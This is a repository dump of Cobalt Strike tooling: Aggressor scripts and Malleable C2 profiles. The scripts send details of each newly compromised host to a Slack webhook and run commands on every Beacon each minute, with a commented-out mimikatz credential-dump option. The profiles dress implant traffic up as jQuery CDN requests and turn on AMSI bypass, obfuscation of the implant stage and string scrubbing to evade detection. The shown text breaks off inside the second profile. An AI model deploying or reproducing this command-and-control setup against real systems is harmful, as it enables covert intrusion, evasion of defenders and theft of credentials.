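├── AggressorScripts
│   ├── BeaconNote.cna
│   ├── BeaconNotify.cna
│   └── LoopDo.cna
├── Malleable C2 Files
│   ├── jquery.xxx.js_CN_cdn.bootcss.com_for_cs3.14_.txt
│   └── jquery.xxx.js_code.bootcdn.net_for_cs4.0_.txt
└── README.md

/AggressorScripts/BeaconNote.cna:
--------------------------------------------------------------------------------
# author: arr0w1
# set Beacon note - set Beacon note to its ID and the time it was established on load and initial checkin
# for example
# bid: 86985 Established: 11/13/2019 16:50:19 (CST)

# beacon_initial fires once, the first time a Beacon checks in.
# $1 is the Beacon ID; the note records that ID plus a timestamp from formatDate().
on beacon_initial {
    bnote($1, "bid: " . $1 . " Established: " . formatDate('MM/dd/yyyy HH:mm:ss (z)'));
}

--------------------------------------------------------------------------------
/AggressorScripts/BeaconNotify.cna:
--------------------------------------------------------------------------------
# author: arr0w1
# Send the message to Slack on beacon_initial(when a Beacon calls home for the first time).
# Replace the 'slack_webhookURL' with yours.
#
# For example, you will receive the following message when a Beacon calls home for the first time.
#
# ------msg------
# teamserver_name: default
#
# beacon id : 12542
# beacon note :
# computer name : WIN7-Jack
# User : Administrator *
# PID : 1140
# host : 10.13.13.13
# external IP : 127.0.0.1
# internal IP : 10.13.13.13
# port :
# os : Windows
# ver : 6.1
# barch : x64
# is64 : 1
# charset : x-mswin-936
# pbid :
# phint : 0
# alive : true
# last : 301
# lastf : 301ms
# ------end------

# Escape a string so it can be placed inside a JSON string literal.
# $1: the raw text. Returns the escaped text.
# The message body is assembled from free-text Beacon metadata (note, computer
# name, user) and contains line breaks; unescaped quotes, backslashes or
# newlines would otherwise produce an invalid {"text": ...} payload.
sub json_escape {
    local('$text');
    # Backslashes first, so the escapes added below are not doubled.
    $text = strrep($1, "\\", '\\');
    $text = strrep($text, '"', '\"');
    $text = strrep($text, "\r", '\r');
    $text = strrep($text, "\n", '\n');
    $text = strrep($text, "\t", '\t');
    return $text;
}

# beacon_initial fires once, the first time a Beacon checks in; $1 is the Beacon ID.
on beacon_initial {
    $one_bid = $1;
    $teamserver_name = "default";
    # The webhook URL is a credential: keep the real value out of committed scripts.
    $slack_webhookURL = 'https://hooks.slack.com/services/TTTTTTTTT/BBBBBBBBB/abc01efL2345q6hhhAAAaj7';

    # One beacon_info() field per line, in the order shown in the example above.
    $msg = "\n------msg------\n" .
        "teamserver_name: " . $teamserver_name . "\n" .
        "\n\n\n" .
        "beacon id : " . beacon_info($one_bid, "id") . "\n" .
        "beacon note : " . beacon_info($one_bid, "note") . "\n" .
        "computer name : " . beacon_info($one_bid, "computer") . "\n" .
        "User : " . beacon_info($one_bid, "user") . "\n" .
        "PID : " . beacon_info($one_bid, "pid") . "\n" .
        "host : " . beacon_info($one_bid, "host") . "\n" .
        "external IP : " . beacon_info($one_bid, "external") . "\n" .
        "internal IP : " . beacon_info($one_bid, "internal") . "\n" .
        "port : " . beacon_info($one_bid, "port") . "\n" .
        "os : " . beacon_info($one_bid, "os") . "\n" .
        "ver : " . beacon_info($one_bid, "ver") . "\n" .
        "barch : " . beacon_info($one_bid, "barch") . "\n" .
        "is64 : " . beacon_info($one_bid, "is64") . "\n" .
        "charset : " . beacon_info($one_bid, "charset") . "\n" .
        "pbid : " . beacon_info($one_bid, "pbid") . "\n" .
        "phint : " . beacon_info($one_bid, "phint") . "\n" .
        "alive : " . beacon_info($one_bid, "alive") . "\n" .
        "last : " . beacon_info($one_bid, "last") . "\n" .
        "lastf : " . beacon_info($one_bid, "lastf") .
        "\n------end------\n";

    # Array form of exec: arguments go straight to curl, no shell parses the message.
    # The curl process's output and exit status are not inspected.
    exec(@('curl', '-X', 'POST', '-H', 'Content-type: application/json', '--data', '{"text":"' . json_escape($msg) . '"}', $slack_webhookURL));
}

--------------------------------------------------------------------------------
/AggressorScripts/LoopDo.cna:
--------------------------------------------------------------------------------
# author: arr0w1
# do somethings every X minutes while enabled.(on all beacons)
# for example, run the command 'xxx' every 1 minutes while (Replace 'xxx' with a custom command)

# Global toggle read by the heartbeat handler below; the Save callback of the
# settings dialog writes it. It is compared as the string 'true'.
$enabledsetting = 'false';

# Show the "Loop Settings" dialog. $1 is empty when invoked from the menu below.
sub your-settings {
    @bids = $1;

    # $3 holds the dialog values when the button is pressed.
    $dialog = dialog("Loop Settings", %(enabled => $enabledsetting), lambda({
        $enabledsetting = $3['enabled'];
    }));

    dialog_description($dialog, "do somethings every X minutes while enabled.(on all beacons)");
    drow_checkbox($dialog, "enabled", "Run the command 'xxx' every 1 minutes while - Enabled:");
    dbutton_action($dialog, "Save");
    dialog_show($dialog);
}

# Runs once a minute; while enabled, it tasks every Beacon returned by beacons().
on heartbeat_1m {
    if ($enabledsetting eq 'true') {
        foreach $beacon (beacons()) {
            # get beacon id
            $id = $beacon['id'];

            # Demo1 - Ask Beacon to run a command with cmd.exe
            # The netstat command requires SYSTEM or Administrator permissions
            # 'xxx'
            bshell($id, "netstat -antob");

            # Demo2 - Ask Beacon to run a command with cmd.exe
            # binput($id, "screenshot");
            # bscreenshot($id);

            # Demo3 - Ask Beacon to dump in-memory credentials with mimikatz
            # binput($id, "logonpasswords");
            # blogonpasswords($id);
        }
    }
}

# Define the top-level menubar
menubar("LoopDo", "loop-settings", 2);

# Define the popup button
popup loop-settings {
    item "Configure Settings" {
        your-settings();
    }
}

--------------------------------------------------------------------------------
/Malleable C2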
Files/jquery.xxx.js_CN_cdn.bootcss.com_for_cs3.14_.txt: -------------------------------------------------------------------------------- 1 | 2 | set sample_name "jQuery Profile"; 3 | set sleeptime "60000"; 4 | set jitter "37"; 5 | set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; 6 | https-certificate { 7 | set C "US"; 8 | set CN "bootcss.com"; 9 | set O "bootcss"; 10 | set OU "Certificate Authority"; 11 | set validity "365"; 12 | } 13 | set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs"; 14 | set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs"; 15 | set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe 16 | set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe 17 | set maxdns "255"; 18 | set dns_max_txt "252"; 19 | set dns_idle "74.125.196.113"; 20 | set dns_sleep "0"; 21 | set dns_stager_prepend ".resources.123456."; 22 | set dns_stager_subhost ".feeds.123456."; 23 | set host_stage "true"; 24 | http-stager { 25 | set uri_x86 "/jquery-3.3.1.slim.min.js"; 26 | set uri_x64 "/jquery-3.3.2.slim.min.js"; 27 | server { 28 | header "Server" "NetDNA-cache/2.2"; 29 | header "Cache-Control" "max-age=0, no-cache"; 30 | header "Pragma" "no-cache"; 31 | header "Connection" "keep-alive"; 32 | header "Content-Type" "application/javascript; charset=utf-8"; 33 | output { 34 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return 
null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return 
e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 38 | print; 39 | } 40 | } 41 | client { 42 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 43 | header "Accept-Language" "en-US,en;q=0.5"; 44 | header "Host" "cdn.bootcss.com"; 45 | header "Referer" "http://cdn.bootcss.com/"; 46 | header "Accept-Encoding" "gzip, deflate"; 47 | } 48 | } 49 | stage { 50 | set userwx "false"; 51 | set stomppe "true"; 52 | set obfuscate "true"; 53 | set name "srv.dll"; 54 | set cleanup "true"; 55 | 56 | set checksum "0"; 57 | set compile_time "12 Nov 2016 14:07:23"; 58 | set entry_point "650688"; 59 | set image_size_x86 "4661248"; 60 | set image_size_x64 "4661248"; 61 | set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | transform-x86 { 72 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; 73 | strrep "ReflectiveLoader" "execute"; 74 | strrep "This program cannot be run in DOS mode" ""; 75 | strrep "beacon.dll" ""; 76 | } 77 | transform-x64 { 78 | prepend 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"; 79 | strrep "ReflectiveLoader" "execute"; 80 | strrep "beacon.x64.dll" ""; 81 | } 82 | stringw "jQuery"; 83 | } 84 | http-get { 85 | set uri "/jquery-3.3.1.min.js"; 86 | set verb "GET"; 87 | client { 88 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 89 | header "Host" "cdn.bootcss.com"; 90 | header "Referer" "http://cdn.bootcss.com/"; 91 | header "Accept-Encoding" "gzip, deflate"; 92 | metadata { 93 | base64url; 94 | prepend "__cfduid="; 95 | header "Cookie"; 96 | } 97 | } 98 | server { 99 | header "Server" "NetDNA-cache/2.2"; 100 | header "Cache-Control" "max-age=0, no-cache"; 101 | header "Pragma" "no-cache"; 102 | header "Connection" "keep-alive"; 103 | header "Content-Type" "application/javascript; charset=utf-8"; 104 | output { 105 | mask; 106 | base64url; 107 | 108 | 109 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return 
null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 113 | print; 114 | } 115 | } 116 | } 117 | http-post { 118 | set uri "/jquery-3.3.2.min.js"; 119 | set verb "POST"; 120 | client { 121 | 
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 122 | header "Host" "cdn.bootcss.com"; 123 | header "Referer" "http://cdn.bootcss.com/"; 124 | header "Accept-Encoding" "gzip, deflate"; 125 | 126 | id { 127 | mask; 128 | base64url; 129 | parameter "__cfduid"; 130 | } 131 | 132 | output { 133 | mask; 134 | base64url; 135 | print; 136 | } 137 | } 138 | server { 139 | header "Server" "NetDNA-cache/2.2"; 140 | header "Cache-Control" "max-age=0, no-cache"; 141 | header "Pragma" "no-cache"; 142 | header "Connection" "keep-alive"; 143 | header "Content-Type" "application/javascript; charset=utf-8"; 144 | output { 145 | mask; 146 | base64url; 147 | 148 | 149 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return 
w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; 153 | print; 154 | } 155 | } 156 | } 157 | -------------------------------------------------------------------------------- /Malleable C2 Files/jquery.xxx.js_code.bootcdn.net_for_cs4.0_.txt: -------------------------------------------------------------------------------- 1 | # Malleable C2 Profile 2 
| # Version: CobaltStrike 4.0 3 | 4 | # Description: 5 | # c2 profile attempting to mimic a jquery.xxxx.js request 6 | # uses signed certificates 7 | # or self-signed certificates 8 | # Authors: @joevest, @andrewchiles, @001SPARTaN 9 | # Modifier: 1135(arr0w1) 10 | 11 | ################################################ 12 | ## Tips for Profile Parameter Values 13 | ################################################ 14 | 15 | ## Parameter Values 16 | ## Enclose parameter in Double quote, not single 17 | ## set useragent "SOME AGENT"; GOOD 18 | ## set useragent 'SOME AGENT'; BAD 19 | 20 | ## Some special characters do not need escaping 21 | ## prepend "!@#$%^&*()"; 22 | 23 | ## Semicolons are ok 24 | ## prepend "This is an example;"; 25 | 26 | ## Escape Double quotes 27 | ## append "here is \"some\" stuff"; 28 | 29 | ## Escape Backslashes 30 | ## append "more \\ stuff"; 31 | 32 | ## HTTP Values 33 | ## Program .http-post.client must have a compiled size less than 252 bytes. 34 | 35 | ################################################ 36 | ## Profile Name 37 | ################################################ 38 | ## Description: 39 | ## The name of this profile (used in the Indicators of Compromise report) 40 | ## Defaults: 41 | ## sample_name: My Profile 42 | ## Guidelines: 43 | ## - Choose a name that you want in a report 44 | set sample_name "jQuery. 
For CS 4.0 Profile"; 45 | 46 | ################################################ 47 | ## Sleep Times 48 | ################################################ 49 | ## Description: 50 | ## Timing between beacon check in 51 | ## Defaults: 52 | ## sleeptime: 60000 53 | ## jitter: 0 54 | ## Guidelines: 55 | ## - Beacon Timing in milliseconds (1000 = 1 sec) 56 | set sleeptime "45000"; # 45 Seconds 57 | #set sleeptime "300000"; # 5 Minutes 58 | #set sleeptime "600000"; # 10 Minutes 59 | #set sleeptime "900000"; # 15 Minutes 60 | #set sleeptime "1200000"; # 20 Minutes 61 | #set sleeptime "1800000"; # 30 Minutes 62 | #set sleeptime "3600000"; # 1 Hours 63 | set jitter "37"; # % jitter 64 | 65 | ################################################ 66 | ## User-Agent 67 | ################################################ 68 | ## Description: 69 | ## User-Agent string used in HTTP requests 70 | ## Defaults: 71 | ## useragent: Internet Explorer (Random) 72 | ## Guidelines 73 | ## - Use a User-Agent values that fits with your engagement 74 | ## - useragent can only be 128 chars 75 | 76 | ## IE 10 77 | # set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)"; 78 | 79 | ## MS IE 11 User Agent 80 | # set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; 81 | 82 | ## macOS 83 | # set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36" 84 | 85 | ## MS win10 Chrome85 86 | set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"; 87 | 88 | 89 | ################################################ 90 | ## SSL CERTIFICATE 91 | ################################################ 92 | ## Description: 93 | ## Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener 94 | ## Defaults: 95 | ## All certificate values are blank 96 | ## 
Guidelines: 97 | ## - Best Option - Use a certificate signed by a trusted certificate authority 98 | ## - Ok Option - Create your own self-signed certificate 99 | ## - Option - Set self-signed certificate values 100 | https-certificate { 101 | 102 | ## Option 1) Trusted and Signed Certificate 103 | ## Use keytool to create a Java Keystore file. 104 | ## Refer to https://www.cobaltstrike.com/help-malleable-c2#validssl 105 | ## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh 106 | 107 | ## Option 2) Create your own Self-Signed Certificate 108 | ## Use keytool to import your own self-signed certificates 109 | 110 | #set keystore "/pathtokeystore"; 111 | #set password "password"; 112 | 113 | ## Option 3) Cobalt Strike Self-Signed Certificate 114 | set C "US"; 115 | set CN "bootcdn.net"; 116 | set O "jQuery"; 117 | set OU "Certificate Authority"; 118 | set validity "365"; 119 | } 120 | 121 | ################################################ 122 | ## Post Exploitations 123 | ################################################ 124 | ## Description: 125 | ## Controls post-exploitation jobs, including default x86/x64 program to open and inject shellcode into, AMSI bypass for execute-assembly, powerpick, and psinject 126 | ## Defaults: 127 | ## spawnto_x86: %windir%\\syswow64\\rundll32.exe 128 | ## spawnto_x64: %windir%\\sysnative\\rundll32.exe 129 | ## obfuscate: false 130 | ## smartinject: false 131 | ## amsi_disable: false 132 | ## Guidelines 133 | ## - spawnto can only be 63 chars 134 | ## - OPSEC WARNING!!!! The spawnto in this example will contain identifiable command line strings 135 | ## - sysnative for x64 and syswow64 for x86 136 | ## - Example x64 : C:\\Windows\\sysnative\\w32tm.exe 137 | ## Example x86 : C:\\Windows\\syswow64\\w32tm.exe 138 | ## - The binary doesn't do anything weird (protected binary, etc) 139 | ## - !! Don't use these !! 
140 | ## - "csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe" 141 | ## - A binary that executes without the UAC 142 | ## - 64 bit for x64 143 | ## - 32 bit for x86 144 | ## - You can add command line parameters to blend 145 | ## - set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs"; 146 | ## - set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs"; 147 | ## - Note: svchost.exe may look weird as the parent process 148 | ## - The obfuscate option scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way. It’s very similar to the obfuscate and userwx options available for Beacon via the stage block. 149 | ## - The amsi_disable option directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities. 150 | ## - The smartinject option directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. This allows post-ex DLLs to bootstrap themselves in a new process without shellcode-like behavior that is detected and mitigated by watching memory accesses to the PEB and kernel32.dll 151 | 152 | post-ex { 153 | # Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes 154 | set spawnto_x86 "%windir%\\syswow64\\dllhost.exe"; 155 | # Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon. 
156 | set spawnto_x64 "%windir%\\sysnative\\dllhost.exe"; 157 | 158 | # change the permissions and content of our post-ex DLLs 159 | set obfuscate "true"; 160 | # pass key function pointers from Beacon to its child jobs 161 | set smartinject "true"; 162 | # disable AMSI in powerpick, execute-assembly, and psinject 163 | set amsi_disable "true"; 164 | } 165 | 166 | ################################################ 167 | ## TCP Beacon 168 | ################################################ 169 | ## Description: 170 | ## TCP Beacon listen port 171 | ## - https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/ 172 | ## - https://www.cobaltstrike.com/help-tcp-beacon 173 | ## Defaults: 174 | ## tcp_port: 4444 175 | ## Guidelines 176 | ## - OPSEC WARNING!!!!! The default port is 4444. This is bad. You can change it dynamically, but the port set in the profile will always be used first before switching to the dynamic port. 177 | ## - Use a port other than the default. Choose something not in use. 178 | ## - Using a port greater than 1024 is generally a good idea 179 | set tcp_port "42585"; 180 | 181 | ################################################ 182 | ## SMB beacons 183 | ################################################ 184 | ## Description: 185 | ## Peer-to-peer beacon using SMB for communication 186 | ## Defaults: 187 | ## pipename: msagent_## 188 | ## pipename_stager: status_## 189 | ## Guidelines: 190 | ## - Do not use an existing named pipe, Beacon doesn't check for conflicts! 
191 | ## - the ## is replaced with a number unique to a teamserver 192 | ## --------------------- 193 | set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe 194 | set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe 195 | 196 | ################################################ 197 | ## DNS beacons 198 | ################################################ 199 | ## Description: 200 | ## Beacon that uses DNS for communication 201 | ## Defaults: 202 | ## maxdns: 255 203 | ## dns_idle: 0.0.0.0 204 | ## dns_max_txt: 252 205 | ## dns_sleep: 0 206 | ## dns_stager_prepend: N/A 207 | ## dns_stager_subhost: .stage.123456. 208 | ## dns_ttl: 1 209 | ## Guidelines: 210 | ## - DNS beacons generate a lot of DNS requests. DNS beacons are best used as low and slow backup C2 channels 211 | set maxdns "255"; 212 | set dns_max_txt "252"; 213 | set dns_idle "74.125.196.113"; #google.com (change this to match your campaign) 214 | set dns_sleep "0"; # Force a sleep prior to each individual DNS request. (in milliseconds) 215 | set dns_stager_prepend ".resources.123456."; 216 | set dns_stager_subhost ".feeds.123456."; 217 | 218 | ################################################ 219 | ## Staging process 220 | ################################################ 221 | ## OPSEC WARNING!!!! Staging has serious OPSEC issues. It is recommended to disable staging and use stageless payloads 222 | ## Description: 223 | ## Malleable C2's http-stager block customizes the HTTP staging process 224 | ## Defaults: 225 | ## uri_x86 Random String 226 | ## uri_x64 Random String 227 | ## HTTP Server Headers - Basic HTTP Headers 228 | ## HTTP Client Headers - Basic HTTP Headers 229 | ## Guidelines: 230 | ## - Add customized HTTP headers to the HTTP traffic of your campaign 231 | ## - Only specify the `Host` header when performing domain fronting. 
